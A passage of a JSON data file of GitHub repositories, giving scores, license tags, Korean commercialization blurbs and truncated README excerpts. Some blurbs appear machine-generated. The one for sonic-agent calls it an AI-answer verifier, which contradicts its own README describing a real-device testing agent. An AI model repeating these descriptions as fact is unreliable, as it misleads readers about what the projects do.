src=\"https://susi.ai/static/images/susi-logo.svg\" alt=\"logo\" width=\"35%\" />\n</p>\n<h1 align=\"center\">SUSI.AI Web Application</h1>\n<p align=\"center\">\n  <a href=\"https://hosted.weblate.org/engage/susi-ai/?utm_source=widget\">\n    <img src=\"https://hosted.weblate.org/widgets/susi-ai/-/chat/svg-badge.svg\" alt=\"Weblate\" />\n  </a>\n  <a href=\"https://www.codacy.com/app/rishiraj824/susi.ai?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi.ai&utm_campaign=badger\">\n    <img src=\"https://api.codacy.com/project/badge/Grade/db948e1eb4b2457386ba80388e8390cf\" alt=\"Codacy Badge\" />\n  </a>\n  <a href=\"https://travis-ci.org/fossasia/susi.ai\">\n    <img src=\"https://travis-ci.org/fossasia/susi.ai.svg?branch=master\" alt=\"Build Status\" />\n  </a>\n  <a href=\"https://gitter.im/fossasia/susi_webclient?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\">\n    <img src=\"https://badges.gitter.im/Join%20Chat.svg\" alt=\"Gitter\" />\n  </a>\n  <a href=\"https:","composite_score":0.4346,"license_safety_tag":"restricted"},{"name":"fossasia/susi.ai","github_url":"https://github.com/fossasia/susi.ai","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":37,"description":"# SUSI.ai 저장소 분석\n\n## 왜 보물인가\n누구나 자신만의 지능형 대화 도우미를 만들고 운영할 수 있는 오픈소스 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 고객 상담용 챗봇을 임대하는 구독형 서비스로 제공\n2. **내부 업무 도구**: 회사 직원들이 업무 관련 질문에 자동으로 답변하는 사내 도우미 시스템\n3. *","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://susi.ai/static/images/susi-logo.svg\" alt=\"logo\" width=\"35%\" />\n</p>\n<h1 align=\"center\">SUSI.AI Web Application</h1>\n<p align=\"center\">\n  <a href=\"https://hosted.weblate.org/engage/susi-ai/?utm_source=widget\">\n    <img src=\"https://hosted.weblate.org/widgets/susi-ai/-/chat/svg-badge.svg\" alt=\"Weblate\" />\n  </a>\n  <a href=\"https://www.codacy.com/app/rishiraj824/susi.ai?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi.ai&utm_campaign=badger\">\n    <img src=\"https://api.codacy.com/project/badge/Grade/db948e1eb4b2457386ba80388e8390cf\" alt=\"Codacy Badge\" />\n  </a>\n  <a href=\"https://travis-ci.org/fossasia/susi.ai\">\n    <img src=\"https://travis-ci.org/fossasia/susi.ai.svg?branch=master\" alt=\"Build Status\" />\n  </a>\n  <a href=\"https://gitter.im/fossasia/susi_webclient?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\">\n    <img src=\"https://badges.gitter.im/Join%20Chat.svg\" alt=\"Gitter\" />\n  </a>\n  <a href=\"https:","composite_score":0.4346,"license_safety_tag":"restricted"},{"name":"mozilla-services/react-jsonschema-form","github_url":"https://github.com/mozilla-services/react-jsonschema-form","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":0,"description":"# React JSONSchema Form 상용화 분석\n\n## 왜 보물인가\n복잡한 입력 양식을 자동으로 만들어주는 기술로, 웹 서비스 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 설정 대시보드**: 고객사별 맞춤형 설정 화면을 자동 생성하는 서비스\n2. **내부 업무 도구**: HR, 회계팀의 데이터 입력 폼을","readme_excerpt":"[![Build Status][build-shield]][build-url]\n[![Contributors][contributors-shield]][contributors-url]\n[![Apache 2.0 License][license-shield]][license-url]\n\n<p align=\"center\">\n  <a href=\"https://github.com/rjsf-team/react-jsonschema-form\">\n    <img src=\"https://raw.githubusercontent.com/rjsf-team/react-jsonschema-form/59a8206e148474bea854bbb004f624143fbcbac8/packages/core/logo.png\" alt=\"Logo\" width=\"180\" height=\"120\">\n  </a>\n\n  <h3 align=\"center\">react-jsonschema-form</h3>\n\n  <p align=\"center\">\n    A simple <a href=\"http://facebook.github.io/react/\">React</a> component capable of using <a href=\"http://json-schema.org/\">JSON Schema</a> to declaratively build and customize web forms.\n    <br />\n    <a href=\"https://rjsf-team.github.io/react-jsonschema-form/docs/\"><strong>Explore the docs »</strong></a>\n    <br />\n    <br />\n    <a href=\"https://rjsf-team.github.io/react-jsonschema-form/\">View Playground</a>\n    ·\n    <a href=\"https://github.com/rjsf-team/react-jsonschema-form/issues\">Report","composite_score":0.4343,"license_safety_tag":"safe"},{"name":"OpenDiablo2/OpenDiablo2","github_url":"https://github.com/OpenDiablo2/OpenDiablo2","stars":16,"language":"Go","license":"GPL-3.0","abandonment_months":56,"description":"","readme_excerpt":"# NOTE \n<image align=\"left\" src=\"https://user-images.githubusercontent.com/242652/138285004-b27d55b3-163b-4fe3-a8ff-6c34518044bd.png\">\nThis project is currently being split into an Engine+Toolset (called Abyss Engine) and the game as a project (still called OpenDiablo 2). The new project repo is located here:\n<br /><br />\nhttps://github.com/AbyssEngine/\n\n<br clear=\"all\" />\n\n# OpenDiablo2\n\n![CircleCI](https://img.shields.io/circleci/build/github/OpenDiablo2/OpenDiablo2/master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/OpenDiablo2/OpenDiablo2)](https://goreportcard.com/report/github.com/OpenDiablo2/OpenDiablo2)\n[![GoDoc](https://pkg.go.dev/badge/github.com/OpenDiablo2/OpenDiablo2?utm_source=godoc)](https://pkg.go.dev/mod/github.com/OpenDiablo2/OpenDiablo2)\n[![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)\n[![Discord](https://img.shields.io/discord/515518620034662421?label=Discord&style=social)](https://disco","composite_score":0.4343,"license_safety_tag":"restricted"},{"name":"crossoverJie/SSM","github_url":"https://github.com/crossoverJie/SSM","stars":5,"language":"Java","license":"gpl-2.0","abandonment_months":96,"description":"# SSM 저장소 분석 보고서\n\n## 왜 보물인가\nSpring, Struts, MyBatis를 결합한 기업용 웹 애플리케이션 개발 템플릿으로, 복잡한 설정 없이 빠르게 비즈니스 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 대상 전자결재, 인사관리, 재무관리 클라우드 솔루션으로 패키징\n- **내부 업무 도구*","readme_excerpt":"\n<p align=\"center\">\n                                                                                                                    \n <img src=\"https://ws4.sinaimg.cn/large/006tNc79ly1fluug8kpmnj30gl07hweq.jpg\" >\n <br/>\n <br/>\n <a href=\"https://travis-ci.org/crossoverJie/SSM\">\n    <img src=\"https://travis-ci.org/crossoverJie/SSM.svg?branch=master\" >\n </a>\n \n <a href=\"https://jq.qq.com/?_wv=1027&k=5HPYvQk\">\n    <img src=\"https://img.shields.io/badge/QQ%E7%BE%A4-787381170-yellowgreen.svg\" >\n </a>\n <a href=\"https://badge.juejin.im/entry/5856c00061ff4b0063be6be0/likes.svg?style=flat-square\">\n    <img src=\"https://badge.juejin.im/entry/5856c00061ff4b0063be6be0/likes.svg?style=flat-square\" >\n </a>\n \n \n <a href=\"https://github.com/ellerbrock/open-source-badge/\">\n    <img src=\"https://badges.frapsoft.com/os/v1/open-source.svg?v=103\" >\n </a>\n \n<p>\n\n\n[中文简介](https://github.com/crossoverJie/SSM/blob/master/README-ZH.md)\n \nI'll update some skills in actual development aperiodically.There are no","composite_score":0.4342,"license_safety_tag":"restricted"},{"name":"async-labs/builderbook","github_url":"https://github.com/async-labs/builderbook","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":14,"description":"# async-labs/builderbook 분석\n\n## 왜 보물인가\n누구나 쉽게 온라인 책이나 강좌를 만들고 팔 수 있는 플랫폼으로, 별도의 기술 지식 없이도 전문가 콘텐츠를 상품화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 교육 콘텐츠 SaaS**\n강사나 강좌 제작자들이 직접 온라인 강좌를 발행·판매하는 플랫폼으로 운영할 수 있습니다.\n\n**","readme_excerpt":"![image](https://user-images.githubusercontent.com/26158226/155850630-137ae3be-aa29-487b-a422-e8fb4db634dc.png)\n\nSupport Ukraine: [link](https://bank.gov.ua/en/news/all/natsionalniy-bank-vidkriv-spetsrahunok-dlya-zboru-koshtiv-na-potrebi-armiyi)<br>\n\n## Builder Book\n\nOpen source web app to self-publish and sell books or other online content. \n\nIf you want to learn how to build this project from scratch, check out our book: https://builderbook.org. \n\nThe open source project is located in the `builderbook` folder. If you purchased our book, codebases for each of the book's chapters are located in the `book` folder.\n\nWe've used this `builderbook` project to build:\n- [Builder Book](https://builderbook.org) - learn how to build full-stack web apps from scratch\n- [SaaS Boilerplate](https://github.com/async-labs/saas) - open source web app to build your own SaaS product\n- [Work in biotech](https://workinbiotech.com) - job board for biotech startup companies\n- [AI-cruiter](https://workinbiotec","composite_score":0.4337,"license_safety_tag":"safe"},{"name":"fwouts/react-screenshot-test","github_url":"https://github.com/fwouts/react-screenshot-test","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":10,"description":"# react-screenshot-test 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 화면이 제대로 나타나는지 자동으로 확인해주는 도구로, 개발자들이 수동으로 확인하던 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 회사의 품질 관리 SaaS**: 클라이언트 웹사이트 변경 후 자동으로 화면 비교 검사를 수행하고 결과를 제","readme_excerpt":"> **Warning**\n>\n> This package is no longer actively maintained.\n\n# React Screenshot Test\n\n[![Logo](brand/logo.png)](https://www.npmjs.com/package/react-screenshot-test)\n\n<p align=\"center\">\n  <a href=\"https://circleci.com/gh/fwouts/react-screenshot-test/tree/master\">\n    <img src=\"https://circleci.com/gh/fwouts/react-screenshot-test.svg?style=shield\" alt=\"CircleCI\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/react-screenshot-test\">\n    <img src=\"https://badge.fury.io/js/react-screenshot-test.svg\" alt=\"npm\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/react-screenshot-test\">\n    <img src=\"https://img.shields.io/npm/dt/react-screenshot-test.svg\" alt=\"downloads\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/react-screenshot-test\">\n    <img src=\"https://img.shields.io/npm/l/react-screenshot-test.svg\" alt=\"license\" />\n  </a>\n</p>\n\n<br />\n<br />\n\nHere is a screenshot test written with `react-screenshot-test`:\n\n[![Code example](example-code.png)](https://github.com/fwouts/re","composite_score":0.4333,"license_safety_tag":"safe"},{"name":"facebook/stetho","github_url":"https://github.com/facebook/stetho","stars":5,"language":"Java","license":"mit","abandonment_months":19,"description":"# Facebook Stetho 분석\n\n## 왜 보물인가\n스마트폰 앱 개발자들이 자신의 앱이 어떻게 작동하는지 컴퓨터에서 직접 들여다보고 문제를 빠르게 찾을 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **모바일 앱 개발사의 내부 도구**: 개발팀이 버그를 신속하게 발견하고 수정하는 데 사용\n- **앱 품질 관리 SaaS**: 앱 성능 모니터","readme_excerpt":"# Stetho [![Build Status](https://travis-ci.org/facebook/stetho.svg?branch=master)](https://travis-ci.org/facebook/stetho)\n\n[Stetho](https://facebook.github.io/stetho) is a sophisticated debug bridge for Android applications. When enabled,\ndevelopers have access to the Chrome Developer Tools feature natively part of\nthe Chrome desktop browser. Developers can also choose to enable the optional\n`dumpapp` tool which offers a powerful command-line interface to application\ninternals.\n\nOnce you complete the set-up instructions below, just start your app and point\nyour laptop browser to `chrome://inspect`.  Click the \"Inspect\" button to\nbegin.\n\n## Set-up\n\n### Download\nDownload [the latest JARs](https://github.com/facebook/stetho/releases/latest) or grab via Gradle:\n```groovy\nimplementation 'com.facebook.stetho:stetho:1.6.0'\n```\nor Maven:\n```xml\n<dependency>\n  <groupId>com.facebook.stetho</groupId>\n  <artifactId>stetho</artifactId>\n  <version>1.6.0</version>\n</dependency>\n```\n\nOnly the main `s","composite_score":0.4331,"license_safety_tag":"safe"},{"name":"M3-org/awesome-metaverse","github_url":"https://github.com/M3-org/awesome-metaverse","stars":7,"language":"","license":"unknown","abandonment_months":21,"description":"# M3-org/awesome-metaverse 분석\n\n## 왜 보물인가\n메타버스 관련 유용한 도구와 자료들을 한곳에 모아놓은 디렉토리로, 메타버스 사업을 시작하려는 사람들이 필요한 정보를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **메타버스 학습 플랫폼**: 기업이나 교육 기관이 메타버스 입문자들을 위한 온라인 강좌를 만들 때 필요한 자","readme_excerpt":"# Awesome Metaverse [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\nList of awesome projects and information resources about the [Metaverse](https://en.wikipedia.org/wiki/Metaverse). Since\nthere are many competing ideas about what the Metaverse is, feel free to leave feedback in the form of pull requests,\nissues, and comments. You can also reach us through [discord](https://m3org.com/discord).\n\n---\n\n## Table of Contents\n\n- [WebXR](#webxr)\n- [Social VR](#social-vr)\n    - [Open-Source Frameworks](#open-source-frameworks)\n    - [Open-Source Tools](#open-source-tools)\n    - [Commercial Frameworks & Tools](#commercial-frameworks--tools)\n    - [2D Platforms](#2d-platforms)\n- [Avatar Providers](#avatar-providers)\n- [Protocols & Standards](#protocols-and-standards)\n- [Books](#books)\n    - [Science Fiction](#sci-fi)\n    - [Non-fiction](#non-fiction)\n- [Media](#media)\n- [Articles & Blogs](#articles-and-blogs)\n- [Crypto](#crypto)\n- [White Papers](#white-papers)\n- [Links](#links)\n\n","composite_score":0.4331,"license_safety_tag":"unknown"},{"name":"apache/incubator-echarts","github_url":"https://github.com/apache/incubator-echarts","stars":8,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"# Apache ECharts\n\n<a href=\"https://echarts.apache.org/\">\n    <img style=\"vertical-align: top;\" src=\"./asset/logo.png?raw=true\" alt=\"logo\" height=\"50px\">\n</a>\n\nApache ECharts is a free, powerful charting and visualization library offering easy ways to add intuitive, interactive, and highly customizable charts to your commercial products. It is written in pure JavaScript and based on <a href=\"https://github.com/ecomfe/zrender\">zrender</a>, which is a whole new lightweight canvas library.\n\n**[中文官网](https://echarts.apache.org/zh/index.html)** | **[ENGLISH HOMEPAGE](https://echarts.apache.org/en/index.html)**\n\n[![License](https://img.shields.io/npm/l/echarts?color=5470c6)](https://github.com/apache/echarts/blob/master/LICENSE) [![Latest npm release](https://img.shields.io/npm/v/echarts?color=91cc75)](https://www.npmjs.com/package/echarts) [![NPM downloads](https://img.shields.io/npm/dm/echarts.svg?label=npm%20downloads&style=flat&color=fac858)](https://www.npmjs.com/package/echarts) [![Cont","composite_score":0.4329,"license_safety_tag":"safe"},{"name":"futurice/android-best-practices","github_url":"https://github.com/futurice/android-best-practices","stars":10,"language":"","license":"NOASSERTION","abandonment_months":57,"description":"# futurice/android-best-practices 분석\n\n## 왜 보물인가\n안드로이드(스마트폰) 앱을 만드는 개발자들이 실수하지 않도록 정리한 '일하는 방법 매뉴얼'로, 검증된 대기업의 노하우가 담겨있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발 교육 플랫폼을 구독 서비스로 제공하여 개발사들에게 팬다.\n2.","readme_excerpt":"# Best practices in Android development\n\nAvoid reinventing the wheel by following these guidelines. Lessons learned from Android developers in [Futurice](http://www.futurice.com). If you are interested in iOS or Windows Phone development, be sure to check also our [**iOS Good Practices**](https://github.com/futurice/ios-good-practices) and [**Windows App Development Best Practices**](https://github.com/futurice/windows-app-development-best-practices) documents.\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-android--best--practices-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1091) \n[![Spice Program Sponsored](https://img.shields.io/badge/chilicorn-sponsored-brightgreen.svg?logo=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAAA4AAAAPCAMAAADjyg5GAAABqlBMVEUAAAAzmTM3pEn%2FSTGhVSY4ZD43STdOXk5lSGAyhz41iz8xkz2HUCWFFhTFFRUzZDvbIB00Zzoyfj9zlHY0ZzmMfY0ydT0zjj92l3qjeR3dNSkoZp4ykEAzjT8ylUBlgj0yiT0ymECkwKjWqAyjuqcghpUykD%2BUQCKoQyAHb%2BgylkAyl0Eyn","composite_score":0.4326,"license_safety_tag":"unknown"},{"name":"ruanyf/react-demos","github_url":"https://github.com/ruanyf/react-demos","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":19,"description":"# ruanyf/react-demos 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 가장 인기 있는 기술(React)의 실제 사용 예시들을 모아놓은 학습 자료로, 초보자부터 전문가까지 참고할 수 있는 실무 레퍼런스입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: React 강의 콘텐츠에 실습 예제를 제공하는 교육용 SaaS\n2. **","readme_excerpt":"This is a collection of simple demos of React.js.\n\nThese demos are purposely written in a simple and clear style. You will find no difficulty in following them to learn the powerful library.\n\n## Related Projects\n\n- [Flux Demo](https://github.com/ruanyf/extremely-simple-flux-demo)\n- [Webpack Demos](https://github.com/ruanyf/webpack-demos)\n- [React Router Tutorial](https://github.com/reactjs/react-router-tutorial)\n- [CSS Modules Demos](https://github.com/ruanyf/css-modules-demos)\n- [React Testing Demo](https://github.com/ruanyf/react-testing-demo)\n- [A boilerplate for React-Babel-Webpack project](https://github.com/ruanyf/react-babel-webpack-boilerplate)\n\n## How to use\n\nFirst, copy the repo into your disk.\n\n```bash\n$ git clone git@github.com:ruanyf/react-demos.git\n```\n\nThen play with the source files under the repo's demo* directories.\n\n## HTML Template\n\n```html\n<!DOCTYPE html>\n<html>\n  <head>\n    <meta charset=\"UTF-8\" />\n    <script src=\"../build/react.development.js\"></script>\n    <scr","composite_score":0.4326,"license_safety_tag":"unknown"},{"name":"gaoxiang12/slambook2","github_url":"https://github.com/gaoxiang12/slambook2","stars":5,"language":"C++","license":"MIT","abandonment_months":17,"description":"# gaoxiang12/slambook2 분석\n\n## 왜 보물인가\n로봇이 자신의 위치를 파악하고 주변 지도를 만드는 핵심 기술을 배우기 위한 완성도 높은 교과서 같은 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **자율주행차 개발 회사의 내부 교육 플랫폼**: 신입 엔지니어들이 위치인식 기술을 학습하는 온보딩 도구로 제공\n2. **드론/로봇 제조업체의 기","readme_excerpt":"## Slambook2\n![titlepage](./figures/title.png)\n\nWelcome to Slambook 2nd Edition! This is the codebase of our book. Here are some relavant links if you need them: \n- [Our book at jd.com](https://item.jd.com/12666058.html)\n- [Our book at douban.com](https://book.douban.com/subject/27028215/) (I'll be happy to get a score at douban)\n- [code of slambook version 1](https://github.com/gaoxiang12/slambook)\n- [slambook in English](https://github.com/gaoxiang12/slambook-en) (Still on going)\n\nEmail me if you have any questions: gao.xiang.thu at gmail dot com. Or send a issue at github if your question is about the code.\n\nErrata will be updated at this code base.\n\nHope you like this book.\n\nBaiduYun backup link in case your github is very slow (common in China): [here](https://pan.baidu.com/s/1XQwpnDb3BOvxXZhL-03p3w)\n\n---\n## 视觉SLAM十四讲：从理论到实践 第二版\n欢迎来到视觉SLAM十四讲：从理论到实践。这里存放本书对应的代码文件。以下是一些可能对你有用的链接：\n- [京东书籍链接](https://item.jd.com/12666058.html)\n- [第一版书代码](https://github.com/gaoxiang12/slambook)\n- [英文版","composite_score":0.4325,"license_safety_tag":"safe"},{"name":"ndianabasi/akpoho-invoicing-software","github_url":"https://github.com/ndianabasi/akpoho-invoicing-software","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"# akpoho-invoicing-software 분석\n\n## 왜 보물인가\n작은 사업가들이 복잡한 청구서 관리에서 벗어나 핵심 사업에 집중할 수 있도록 돕는 간단한 송장 관리 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 월 구독형으로 제공하여 프리랜서와 소상공인들이 매월 정액으로 청구서 발행·관리\n2. **내부 업무 도구**: 회","readme_excerpt":"# Akpoho Invoicing Software\n\nAkpoho Invoicing Software is an open-source software which provides quotation, invoicing, and receipt functionalities for small businesses. Akpoho means money in Annang language spoken by the Annang people of Akwa Ibom state, Nigeria.\n\nThe software is open-sourced in order the form a reference point for the development of a full-stack web application using Adonisjs and Vuejs. When fully-developed, you can use it for managing your invoices, receipts, and quotations for your business.\n\n## Technology Stack\n\nAkpoho Invoicing Software is developed with the following technologies:\n1. The frontend is developed with the Quasar Framework (a Vuejs framework),\n2. The backend is developed with the Adonisjs framework (a Nodejs framework),\n3. MySQL is used for data persistence on the backend,\n4. Redis is used for data caching and caching of authentication tokens\n\n## Demo\n\nYou can explore the application through the demo site: https://demo.akpoho.com. Please note that Akp","composite_score":0.4318,"license_safety_tag":"safe"},{"name":"android10/Android-CleanArchitecture","github_url":"https://github.com/android10/Android-CleanArchitecture","stars":13,"language":"Java","license":"apache-2.0","abandonment_months":37,"description":"# android10/Android-CleanArchitecture 분석\n\n## 왜 보물인가\n안드로이드 앱을 체계적이고 안정적으로 만드는 방법을 배울 수 있는 교과서 같은 코드 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 앱 개발 서비스**: 스타트업이나 중소기업을 위해 안정적인 안드로이드 앱 개발 대행\n2. **개발자 교육 플랫폼**: 프로그래","readme_excerpt":"Android-CleanArchitecture \n=========================\n\n## New version available written in Kotlin:\n[Architecting Android… Reloaded](https://fernandocejas.com/2018/05/07/architecting-android-reloaded/)\n\nIntroduction\n-----------------\nThis is a sample app that is part of a blog post I have written about how to architect android application using the Uncle Bob's clean architecture approach. \n\n[Architecting Android…The clean way?](http://fernandocejas.com/2014/09/03/architecting-android-the-clean-way/)\n\n[Architecting Android…The evolution](http://fernandocejas.com/2015/07/18/architecting-android-the-evolution/)\n\n[Tasting Dagger 2 on Android](http://fernandocejas.com/2015/04/11/tasting-dagger-2-on-android/)\n\n[Clean Architecture…Dynamic Parameters in Use Cases](http://fernandocejas.com/2016/12/24/clean-architecture-dynamic-parameters-in-use-cases/)\n\n[Demo video of this sample](http://youtu.be/XSjV4sG3ni0)\n\nClean architecture\n-----------------\n![http://fernandocejas.com/2015/07/18/architecting","composite_score":0.4315,"license_safety_tag":"safe"},{"name":"apache/incubator-pulsar","github_url":"https://github.com/apache/incubator-pulsar","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Apache Pulsar 분석 보고서\n\n## 왜 보물인가\n전 세계 수백만 건의 실시간 데이터를 동시에 처리할 수 있는 메시지 전달 시스템으로, 금융·통신·배달앱 같은 대규모 서비스의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 실시간 알림 플랫폼**\n배달 앱의 주문 상태 업데이트, 금융앱의 주식 가격 변동 알림 등 수백만 ","readme_excerpt":"<!--\n\n    Licensed to the Apache Software Foundation (ASF) under one\n    or more contributor license agreements.  See the NOTICE file\n    distributed with this work for additional information\n    regarding copyright ownership.  The ASF licenses this file\n    to you under the Apache License, Version 2.0 (the\n    \"License\"); you may not use this file except in compliance\n    with the License.  You may obtain a copy of the License at\n\n      http://www.apache.org/licenses/LICENSE-2.0\n\n    Unless required by applicable law or agreed to in writing,\n    software distributed under the License is distributed on an\n    \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n    KIND, either express or implied.  See the License for the\n    specific language governing permissions and limitations\n    under the License.\n\n-->\n\n![logo](https://pulsar.apache.org/img/pulsar.svg)\n\n[![docker pull](https://img.shields.io/docker/pulls/apachepulsar/pulsar-all.svg)](https://hub.docker.com/r/apachepulsar/pulsar","composite_score":0.4309,"license_safety_tag":"safe"},{"name":"darkmatter2222/COD-MW-2019-DNN","github_url":"https://github.com/darkmatter2222/COD-MW-2019-DNN","stars":8,"language":"Python","license":"GPL-3.0","abandonment_months":66,"description":"","readme_excerpt":"# COD-MW-2019-DNN\nDeep Neural Networks for Call Of Duty Modern Warfare 2019  \nContained are the scripts, training data, validation data as well as the .h5 model files for various Call of Duty Modern Warfare Neural Networks  \nTrain Dataset > 5 GB  \nValidation Dataset > 200 MB  \n\n# Enemy Detector\n### Intent\nLook at a 200x200 pixel block at the center of the uers screen, determine if there is an enemy somewhere in that block. If you have ever played COD, then there is a high chance that by just looking at the below, you would agree if there is an enemy in these images. Realisticly, this is a neural network trained on successfully detecting Gamertags in a 200x200 block.    \n![](https://imgur.com/5Fowghj.png) ![Targets](Misc/targets.gif)  \nModel Here: https://www.kaggle.com/darkmatter2222/codmw2019dnnmodels?select=CODV7.h5  \nModel Here: https://www.kaggle.com/darkmatter2222/codmw2019dnnmodels?select=CODV9.h5  \nTraining Images: https://www.kaggle.com/darkmatter2222/codmw2019dnnmodels?select=","composite_score":0.4306,"license_safety_tag":"restricted"},{"name":"practicalAI/practicalAI","github_url":"https://github.com/practicalAI/practicalAI","stars":12,"language":"Jupyter Notebook","license":"MIT","abandonment_months":3,"description":"# practicalAI 저장소 분석\n\n## 왜 보물인가\n실제 업무에 바로 적용 가능한 인공지능 실습 자료를 모아놓은 자료실로, 이론만 아는 개발자들이 실무 프로젝트에 AI를 활용하도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼 SaaS**: 기업 직원들이 실제 예제를 따라하며 AI를 배우는 온라인 학습 서비스\n2. **개발사 내부 도","readme_excerpt":"<div align=\"center\">\n<h1><img width=\"30\" src=\"https://madewithml.com/static/images/rounded_logo.png\">&nbsp;<a href=\"https://madewithml.com/\">Made With ML</a></h1>\nDesign · Develop · Deploy · Iterate\n<br>\nJoin 40K+ developers in learning how to responsibly deliver value with ML.\n    <br>\n</div>\n\n<br>\n\n<div align=\"center\">\n    <a target=\"_blank\" href=\"https://madewithml.com/\"><img src=\"https://img.shields.io/badge/Subscribe-40K-brightgreen\"></a>&nbsp;\n    <a target=\"_blank\" href=\"https://github.com/GokuMohandas/Made-With-ML\"><img src=\"https://img.shields.io/github/stars/GokuMohandas/Made-With-ML.svg?style=social&label=Star\"></a>&nbsp;\n    <a target=\"_blank\" href=\"https://www.linkedin.com/in/goku\"><img src=\"https://img.shields.io/badge/style--5eba00.svg?label=LinkedIn&logo=linkedin&style=social\"></a>&nbsp;\n    <a target=\"_blank\" href=\"https://twitter.com/GokuMohandas\"><img src=\"https://img.shields.io/twitter/follow/GokuMohandas.svg?label=Follow&style=social\"></a>\n    <br>\n    🔥&nbsp; Amon","composite_score":0.4304,"license_safety_tag":"safe"},{"name":"vshymanskyy/embedded-wasm-apps","github_url":"https://github.com/vshymanskyy/embedded-wasm-apps","stars":23,"language":"C","license":"MIT","abandonment_months":21,"description":"# embedded-wasm-apps 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이도 작은 기기들에서 웹 기술로 앱을 만들 수 있는 기술로, IoT 기기나 임베디드 시스템 개발의 진입장벽을 크게 낮춥니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 기기 제조사의 설정 도구**\n- 세탁기, 에어컨 등 가전제품 내부에 웹 기반 설정 앱을 내장하여","readme_excerpt":"[![SWUbanner](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner-direct.svg)](https://vshymanskyy.github.io/StandWithUkraine)\n\n# embedded-wasm-apps\n\nRun **native, statically-compiled** apps on any platform, using WebAssembly.  \nExamples include [<img src=\"https://cdn.rawgit.com/simple-icons/simple-icons/develop/icons/assemblyscript.svg\" width=\"18\" height=\"18\" /> AssemblyScript](apps/assemblyscript/app.ts), \n[<img src=\"https://cdn.rawgit.com/simple-icons/simple-icons/develop/icons/rust.svg\" width=\"18\" height=\"18\" /> Rust](apps/rust/src/app.rs), \n[<img src=\"https://cdn.rawgit.com/simple-icons/simple-icons/develop/icons/cplusplus.svg\" width=\"18\" height=\"18\" /> C/C++](apps/cpp/app.cpp), \n[<img src=\"https://cdn.rawgit.com/simple-icons/simple-icons/develop/icons/go.svg\" width=\"18\" height=\"18\" /> TinyGo](apps/tinygo/app.go), \n[<img src=\"https://cdn.rawgit.com/simple-icons/simple-icons/develop/icons/zig.svg\" width=\"18\" height=\"18\" /> Zig](apps/zig/main.zig), \n[Virgil](a","composite_score":0.4304,"license_safety_tag":"safe"},{"name":"ZhouYixun/sonic-agent","github_url":"https://github.com/ZhouYixun/sonic-agent","stars":6,"language":"Java","license":"AGPL-3.0","abandonment_months":15,"description":"# sonic-agent 상용화 분석\n\n## 왜 보물인가\nAI가 생성한 답변의 정확성을 자동으로 검증해주는 기술로, 신뢰할 수 없는 AI 서비스의 가장 큰 약점을 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 검증 SaaS**\n- 고객 지원 챗봇이 잘못된 정보를 제공하지 않도록 실시간으로 확인해주는 서비스\n\n**2. 기업 내부 AI ","readme_excerpt":"<p align=\"center\">\r\n  <img width=\"80px\" src=\"https://raw.githubusercontent.com/SonicCloudOrg/sonic-server/main/logo.png\">\r\n</p>\r\n<p align=\"center\">🎉Agent of Sonic Cloud Real Machine Platform</p>\r\n<p align=\"center\">\r\n  <span>English |</span>\r\n  <a href=\"https://github.com/SonicCloudOrg/sonic-agent/blob/main/README_CN.md\">  \r\n     简体中文\r\n  </a>\r\n</p>\r\n<p align=\"center\">\r\n  <a href=\"#\">  \r\n    <img src=\"https://img.shields.io/github/v/release/SonicCloudOrg/sonic-agent?include_prereleases\">\r\n  </a>\r\n  <a href=\"#\">  \r\n    <img src=\"https://img.shields.io/badge/platform-windows|macosx|linux-success\">\r\n  </a>\r\n</p>\r\n<p align=\"center\">\r\n  <a href=\"#\">  \r\n    <img src=\"https://img.shields.io/github/commit-activity/m/SonicCloudOrg/sonic-agent\">\r\n  </a>\r\n  <a href=\"#\">  \r\n    <img 